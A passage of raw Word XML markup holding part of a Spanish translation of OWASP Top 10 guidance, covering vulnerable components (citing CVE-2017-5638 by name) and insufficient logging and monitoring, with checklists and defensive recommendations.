              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">• Obtener componentes únicamente de orígenes oficiales utilizando canales seguros. Utilizar preferentemente paquetes firmados con el fin de reducir las probabilidades de uso de versiones manipuladas maliciosamente. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="008E1212">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supervisar bibliotecas y componentes que no poseen mantenimiento o no liberan parches de seguridad para sus versiones obsoletas o sin soporte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Ejemplos de escenarios de ataque</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00F94763">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Escenario #1: </w:t>
            </w:r>
            <w:r w:rsidRPr="00F94763">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>típicamente, los componentes se ejecutan con los mismos privilegios de la aplicación que los contienen y, como consecuencia, fallas en éstos pueden resultar en impactos serios. Estas fallas pueden ser accidentales (por ejemplo, errores de codificación) o intencionales (una puerta trasera en un componente). Algunos ejemplos de vulnerabilidades en componentes explotables son:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00F94763" w:rsidRDefault="00912EEA" w:rsidP="00F94763">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F94763">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2017-5638, una ejecución remota de código en Struts 2 que ha sido culpada de grandes brechas de datos. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00F94763" w:rsidRDefault="00912EEA" w:rsidP="00F94763">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F94763">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Aunque frecuentemente los dispositivos de Internet de las Cosas (IoT) son imposibles o muy dificultosos de actualizar, la importancia de estas actualizaciones puede ser enorme (por ejemplo en dispositivos biomédicos).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="003E1407" w:rsidRDefault="003E1407" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F42F977" wp14:editId="676909D8">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-64770</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>0</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1267002" cy="857370"/>
                  <wp:effectExtent l="0" t="0" r="9525"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441B54.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId92">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1267002" cy="857370"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Registro y Monitoreo Insuficientes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00252FA9" w:rsidRDefault="00912EEA" w:rsidP="00252FA9">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00252FA9">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El registro y monitoreo insuficiente, junto a la falta de respuesta ante incidentes permiten a los atacantes mantener el ataque en el tiempo, pivotear a otros sistemas y manipular, extraer o destruir datos. Los estudios muestran que el tiempo de detección de una brecha de seguridad es mayor a 200 días, siendo típicamente detectado por terceros en lugar de por procesos internos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00167841" w:rsidRDefault="00167841" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00252FA9">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251705344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43AB857A" wp14:editId="262C6347">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-114935</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-58420</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="8258175" cy="856615"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="635"/>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4471CD.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId93">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8258175" cy="856615"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00167841" w:rsidRPr="00912EEA" w:rsidTr="00296F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rsidR="00912EEA" w:rsidRPr="00167841" w:rsidRDefault="00912EEA" w:rsidP="00C54231">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00167841">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">El registro y monitoreo insuficientes es la base de casi todos los grandes y mayores incidentes de seguridad. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00C54231">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00167841">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los atacantes dependen de la falta de monitoreo y respuesta oportuna para lograr sus objetivos sin ser detectados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00C54231">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Las acciones de los evaluadores deben registrarse lo suficiente como para comprender los daños que podrían haber causado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3680" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00C54231">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los ataques más exitosos comienzan con la exploración de vulnerabilidades. Permitir que el sondeo de vulnerabilidades continúe puede aumentar la probabilidad de una explotación exitosa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6091" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>¿La aplicación es vulnerable?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00873D54" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00873D54">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El registro y monitoreo insuficientes ocurren en cualquier momento:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00873D54" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00873D54">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Eventos auditables, tales como los inicios de sesión, fallos en el inicio de sesión, y transacciones de alto valor no son registrados. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00873D54" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00873D54">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Advertencias y errores generan registros poco claros, inadecuados o ninguno en absoluto. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00873D54" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00873D54">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Registros en aplicaciones o APIs no son monitoreados para detectar actividades sospechosas. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00873D54" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00873D54">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Los registros son almacenados únicamente de forma local. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00873D54" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00873D54">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Los umbrales de alerta y de escalamiento de respuesta no están implementados o no son eficaces. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00873D54" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00873D54">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Las pruebas de penetración y escaneos utilizando herramientas DAST (como OWASP ZAP) no generan alertas.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00873D54" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00873D54">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">La aplicación no logra detectar, escalar o alertar sobre ataques en tiempo real. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00873D54">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>También es vulnerable a la fuga de información si registra y alerta eventos visibles para un usuario o un atacante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6089" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Plan de contingencia</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Según el riesgo de los datos almacenados o procesados por la aplicación:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Asegúrese de que todos los errores de inicio de sesión, de control de acceso y de validación de entradas de datos del lado del servidor se pueden registrar para identificar cuentas sospechosas.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Asegúrese de que las transacciones de alto impacto tengan una pista de auditoría con controles de integridad para prevenir alteraciones o eliminaciones. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00873D54">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
